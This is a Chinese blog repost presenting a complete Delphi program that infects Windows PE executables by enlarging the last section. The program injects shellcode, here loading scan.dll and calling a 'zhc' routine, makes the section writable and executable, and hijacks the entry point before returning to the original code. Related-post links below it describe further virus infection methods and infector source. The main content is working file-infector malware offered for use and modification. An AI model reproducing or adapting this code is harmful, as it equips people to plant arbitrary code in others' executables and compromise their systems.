PE扩展节方式感染

最新推荐文章于 2024-06-10 19:29:16 发布
最新推荐文章于 2024-06-10 19:29:16 发布
阅读量155 收藏
点赞数
文章标签: c/c++ 操作系统
原文链接:http://www.cnblogs.com/bsoom/archive/2009/11/14/1603057.html
版权

原理是:修改最后一个节并给最后一个节增加长度,然后在增加的区域中间写入代码,本方法的好处是相对前面一种方法可以写入更多的代码,并且拥有更好的兼容性。。

code:

 

ContractedBlock.gif ExpandedBlockStart.gif Code
program PE_Infection;       {Code By 箫竹}

{$APPTYPE CONSOLE}

uses
SysUtils,
windows,
classes;

const
DEBUG=TRUE;               
EXTRA_CODE_LENGTH=159;    //注入代码长度,修改注入代码后,需要修改此值

var
code:array[0..EXTRA_CODE_LENGTH-8of byte=(
$83,$EC,$40,$89,$E5,$56,$89,$65,$1E,$55,$64,$8B,$05,
$30,$00,$00,$00,$8B,$40,$0C,$8B,$70,$1C,$AD,$8B,$40,
$08,$89,$C5,$8B,$45,$3C,$8B,$54,$28,$78,$01,$EA,$8B,
$4A,$18,$8B,$5A,$20,$01,$EB,$49,$8B,$34,$8B,$01,$EE,
$B8,$47,$65,$74,$50,$39,$06,$75,$F1,$B8,$72,$6F,$63,
$41,$39,$46,$04,$75,$E7,$8B,$5A,$1C,$01,$EB,$8B,$04,
$8B,$01,$E8,$89,$E9,$5D,$89,$45,$0E,$89,$4D,$0A,$6A,
$00,$68,$61,$72,$79,$41,$68,$4C,$69,$62,$72,$68,$4C,
$6F,$61,$64,$54,$FF,$75,$0A,$FF,$55,$0E,$89,$45,$12,
$6A,$00,$68,$2E,$64,$6C,$6C,$68,$73,$63,$61,$6E,$54,
$FF,$55,$12,$68,$7A,$68,$63,$00,$54,$50,$FF,$55,$0E,
$FF,$D0,$8B,$65,$1E,$5E,$83,$C4,$40);                  //感染代码作用是加载scan.dll,执行zhc过程,可以自行修改
dosheader:IMAGE_DOS_HEADER;     //dos头部
NTheader:IMAGE_NT_HEADERS;      //NT头部
SectionHeader:IMAGE_SECTION_HEADER;   //节头
numofSections,pnewfile,file_align_ment,section_align_ment:integer;
i,j,extraLengthAfterAlign:integer;
newEP,oldEP,cstart:dword;
srcFileName,newFileName,Taddr:string;
bytewrite:byte;

function align(size,ALIGN_BASE:integer):integer;   //对齐函数
var
ret,results:integer;
begin
assert( 0 <> ALIGN_BASE );
results:= size div ALIGN_BASE;
if results<>0 then           //如果不能整除
    ret:=((size div ALIGN_BASE)+1)*ALIGN_BASE //填满
else
   ret:=size;
align:=ret;
end;

begin
write('输入要感染的文件名:');
readln(srcFileName);
newfilename:=srcfilename+'.exe';    //保护原文件,复制一份
CopyFile(pchar(srcFileName), pchar(newFileName), FALSE);
pnewfile:=fileopen(newfilename,fmopenreadwrite or fmShareDenyNone);
fileseek(pnewfile,0,sofrombeginning);
fileread(pnewfile,DosHeader, sizeof(IMAGE_DOS_HEADER));
if DosHeader.e_magic <> IMAGE_DOS_SIGNATURE then   //检验标志
begin
{$IF DEBUG}
   writeln('不是一个正确的PE文件');
{$IFEND}
exit;
end;
fileseek(pNewFile, DosHeader._lfanew, sofrombeginning);
fileread(pnewfile,NTheader,sizeof(image_nt_headers));
if (NtHeader.Signature <> IMAGE_NT_SIGNATURE) then
begin
{$IF DEBUG}
writeln('不是一个正确的PE文件');
{$IFEND}
exit;
end;      //验证完毕,目标是一个PE文件
numOfSections := NtHeader.FileHeader.NumberOfSections; 
FILE_ALIGN_MENT := NtHeader.OptionalHeader.FileAlignment;
SECTION_ALIGN_MENT := NtHeader.OptionalHeader.SectionAlignment;
{$IF DEBUG}
        writeln(format('FILE_ALIGN_MENT-> %x',[FILE_ALIGN_MENT]));
        writeln(format('SECTION_ALIGN_MENT-> %x',[FILE_ALIGN_MENT]));
{$IFEND}
//保存原来的入口备用
oldEP := NtHeader.OptionalHeader.AddressOfEntryPoint;
//定位到最后一个SectionHeader
for i:=1 to numofsections do
begin
fileread(pnewfile,SectionHeader,sizeof(IMAGE_SECTION_HEADER));
{$IF DEBUG}
write('节的名字:');
for j:=0 to 7 do
   write(chr(SectionHeader.Name[j]));
writeln;
{$IFEND}
end;
extraLengthAfterAlign := Align(EXTRA_CODE_LENGTH, FILE_ALIGN_MENT);
cstart:=sectionheader.PointerToRawData+sectionheader.SizeOfRawData; //找到该节的末尾
newep:=cstart+sectionheader.VirtualAddress-sectionheader.PointerToRawData; //计算新入口点
{$IF DEBUG}
writeln(format('原入口点:%x',[OldEp]));
writeln(format('修改后的入口点:%x',[newEp]));
{$IFEND}
//修改SizeOfRawData
sectionheader.SizeOfRawData:=sectionheader.SizeOfRawData+ Align(extraLengthAfterAlign, SECTION_ALIGN_MENT);
//修改VirtualSize
sectionheader.Misc.VirtualSize:=NewEP+EXTRA_CODE_LENGTH;
//修改该节的属性
SectionHeader.Characteristics := $E0000060;        //可读写可执行
fileseek(pnewfile,dosheader._lfanew+sizeof(ntheader)+(numofsections-1)*sizeof(image_section_header),sofrombeginning);
filewrite(pnewfile,sectionheader,sizeof(sectionheader));
//修改入口点
ntheader.OptionalHeader.AddressOfEntryPoint:=newep;
//修正SizeOfImage
NtHeader.OptionalHeader.SizeOfImage := Align(sectionheader.Misc.VirtualSize+sectionheader.VirtualAddress, SECTION_ALIGN_MENT); //修正SizeOfImage
fileseek(pnewfile,dosheader._lfanew,sofrombeginning);
filewrite(pnewfile,ntheader,sizeof(ntheader));
fileseek(pnewfile,cstart,sofrombeginning);
for i:=0 to EXTRA_CODE_LENGTH-8 do   
filewrite(pnewfile,code[i],1);
Taddr:=inttohex(oldep+ntheader.OptionalHeader.ImageBase,8);
bytewrite:=$b8;
filewrite(pnewfile,bytewrite,1); //写入代码
for i:=4 downto 1 do
begin           //mov eax,原入口点
bytewrite:=strtoint('$'+Taddr[i*2-1]+Taddr[i*2]);
filewrite(pnewfile,bytewrite,1);               //跳回原入口点
end;
bytewrite:=$ff;
filewrite(pnewfile,bytewrite,1);
bytewrite:=$d0;      //Call Eax
filewrite(pnewfile,bytewrite,1);
bytewrite:=$c3;     //Retn
filewrite(pnewfile,bytewrite,1);
{$IF DEBUG}
   writeln('已写入代码的长度:',EXTRA_CODE_LENGTH);
   writeln('写入完毕');
   readln;
{$IFEND}
end.

 

本代码的兼容性较于前面一个代码要高,但代码难度略高一些,涉及更多PE结构方面的知识,是本人参考一个C++写出的PE文件感染的代码后,
加以改进写出来的,可以有效的感染加壳后的文件,但是在感染Flash,自解压文件时,可能会破坏掉自解压/Flash的内容,故不赞成感染此类文件..

转载于:https://www.cnblogs.com/bsoom/archive/2009/11/14/1603057.html

weixin_33989058
关注
PE扩大
m0_63206880的博客
03-29 578
注意:扩大最好在最后扩展 不然要修改好多东西 一:扩大 1、拉伸到内存 2、分配一块新的空间:SizeOfImage+Ex 3、将最后一个的SizeOfRawData 和 VirtualSize改成N SizeOfRawData = VirtualSize = N N = (SizeOfRawData或者Virtualsize 内存对齐后的值)+Ex 4、修改sizeofimage大小 Sizeofimage= sizeofimage+Ex 下面是实现代码: ...
变形PE头添加形式感染学习笔记
ProgrammingRing的专栏
11-02 2006
原文链接:点击打开链接  1> 变形PE头的原理: 这里的变形PE头的思路是用的比较方便的方法,就是将IMAGE_DOS_HEADER 和 IMAGE_NT_HEADER 结构融合到一起。因为我们都知IMAGE_DOS_HEADER和IMAGE_NT_HEADER的结构成员很多我们是用不到的,所以我们可以按照相应的结构排列,把这些无用的结构成员,融合到一起后,替换成一些有用的
PE知识复习之PE扩大
weixin_30619101的博客
10-01 275
              PE知识复习之PE扩大 一丶为什么扩大   上面我们讲了,空白区添加我们的代码.但是有的时候.我们的空白区不够了怎么办.所以需要进行扩大.   扩大其实很简单.修改数据对齐后的大小即可. 并且在PE文件中添加0数据进行填充即可. 首先看一下我们的表 typedef struct _IMAGE_SECTION_HEADER { B...
PE_扩大
qq_42363151的博客
09-25 190
PE逆向
PE文件扩大
istream1的博客
12-04 539
PE文件扩大
学习笔记:病毒感染PE文件的基本方法
编程爱好者
03-13 5888
2007-06-27 02:40 PE病毒常见的感染其它文件的方法是在文件中添加一个新,然后往该中添加病毒代码和病毒执行后返回HOST程序的代码,并修改文件头中代码开始执行位置(Address Of EntryPoint)指向新添加的病毒的代码入口,以便程序运行后先执行病毒代码。下面具体分析一下感染文件
class5-PE结构及PE感染
05-11
在实践中,创建一个PE感染者需要对PE结构有深入的理解,包括如何定位插入点、如何修改区表、如何保持原始PE文件的完整性等。课程中可能会涵盖以下几个关键步骤: 1. **文件分析**:首先,需要分析目标PE文件的...
感染PE文件示例源码(C++与汇编)
03-25
7. **区操作**:增加新的区或扩展现有区以容纳附加代码。 8. **表更新**:修改表以指示新的代码或数据位置。 9. **入口点调整**:如果感染后需要在原程序执行前添加自定义逻辑,需要更新PE的入口点。 ...
易语言PE插件注入源码-易语言
06-13
1. **PE文件结构**:了解PE文件的头文件、区、导入导出表等组成部分,是进行PE插件注入的基础。你需要知道如何定位和修改PE文件的内存映像,以便将插件代码正确插入。 2. **进程地址空间**:理解Windows进程的...
exe感染与清除.zip易语言项目例子源码下载
03-21
3. PE文件结构分析:了解PE(Portable Executable)文件格式,解析可执行文件的区、导出导入表等关键部分,寻找潜在的恶意代码。 4. 恶意行为检测:通过分析代码特征和行为模式来识别可能的恶意活动,如自我复制、...
PE文件的感染C++源代码
01-17
PE文件的感染C++源代码 PE文件规定了可执行文件的格式,凡是符合此格式的文件都能在windows系统上运行。PE文件的格式暂且不谈,说一些感染PE文件的几种途径。 导入表感染。这个涉及比较复杂的操作,首先,要自行写一个dll文件,提供程序中对原dll引用的所有函数,然后增加一个区,修改ImportAddress中的地址,使其指向新增加的,这样,程序加载后,只要调用相关函数,就会先执行自己写的dll,执行完后,再跳转到原代码人口处执行。 导入地址感染。这个相对简单些,在PE文件头部分,IMAGE_OPTION_HEADER中有个ImportAddress目录,这个目录中只是一些jmp指令,我们可以修改jmp指令跳转的地址,使其指向在PE文件中我们新增加的代码。这需要在原PE文件中增加代码,PE文件在硬盘上默认200H字对齐,一般存有空隙,如果代码量小,不用增加新就可以插入代码。 修改入口函数地址。这个是最省事的办法,在原PE文件中新增加一个,计算新的RVA,然后修改入口代码,使其指向新增加的。当然,如果.text空隙足够大的话,不用添加新也可以。 修改快捷方式文件。如果PE文件存在快捷方式,可以先行感染快捷方式,使快捷方式指向自己写的程序,自写程序启动后,再执行真正的PE文件。这种做法比较猥琐,而且不可靠。
最新EXE感染代码。PE感染
08-31
仅限于技术交流。请勿做非法用图!!感染代码,PE感染
9.PE文件之扩大
kernelhack
10-28 3782
目录 扩大PE文件中哪些值会有影响? 扩大步骤: 手动扩大 代码扩大 通常扩大最后一个比较方便,假设扩大第一个则后续所有对应的数据都需要更改. 扩大PE文件中哪些值会有影响? 最后一个IMAGE_SECTION_HEADER结构成员中SizeOfRawData和VirtualSize. IMAGE_OPTIONAL_HEADER → SizeOfImage(扩大后在内存中的大小需要修正). 扩大步骤: 将最后一个文件中的大小修改为当前文件大小加新增大小(文
PE结构-扩大区(附实例代码)
Alone的博客
10-24 435
1、拉伸到内存 2、分配一块新的空间:SizeOfImage + Ex 3、将最后一个的SizeOfRawData和VirtualSize改成N SizeOfRawData = VirtualSize = N N = (SizeOfRawData或者VirtualSize 内存对齐后的值) + Ex 4、修改SizeOfImage大小 SizeOfImage = SizeOfImage + Ex 5.添加表属性 ...
PE文件(七)扩大合并数据目录
最新发布
2301_78838647的博客
06-10 1122
添加shellcode有以下几种的方式:1.直接在任意的空白区添加代码2.新增添加代码3.扩大最后一个添加代码4.合并并添加代码今天我们学习如何扩大,合并扩大在上一的学习中,我们可以通过上移NT头和表覆盖DOS Stub以获取足够的空白区来增加新的表以及后续新增,但是当整体上移覆盖DOS Stub之后,多出来的空白区域还不够新增表时,我们就可以使用扩大最后一个的方法来添加我们的shellcode扩大主要用于当我们在。
PE文件扩大的代码实现
qq_31125257的博客
12-11 770
一、扩大(一般只适合扩大最后一个) //1、拉伸到内存 //2、重新分配一块新的内存:SizeOfImage + Ex //3、将最后一个的SizeOfRawData和VirtualSize改成N, // N=SizeOfRawData=VirtualSize=(SizeOfRawData或者VirtualSize 内存对齐后的值) + Ex //4、修改sizeofimage大小,sizeofimage = sizeofimage + Ex 二、代码实现 PVOID EnlargeLast
PE新增|扩大|合并
个人笔记
05-21 667
PE操作新增实现步骤扩大实现步骤合并实现步骤 新增 PE结构使用: SizeOfImage NumberOfSections VirtualSize VirtualAddress SizeOfRawData PointerToRawData 实现步骤 -判读那是否有足够空间,可以添加一个表 SizeOfHeaders-(DOS+DOS STUB+NT头+已存在表) >=2个表大小 满足才可添加,否则提升PE头 -完善新增表内容 -在新添表后面填充一个(表)大小的00 -修改PE
VC实现简单的PE文件感染(增加的是downloader功能)
weixin_34004750的博客
03-17 178
所有的的实现都封装好。调用的头文件在pe1.h中。有两个方法 一个是int PeFiles(),实现对system32下面指定的exe文件进行感染 第二个是void ScanDisk(const char* path),对指定目录实现遍历感染PE感染源代码下载 转载于:https://blog.51cto.com/realwizard/912...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值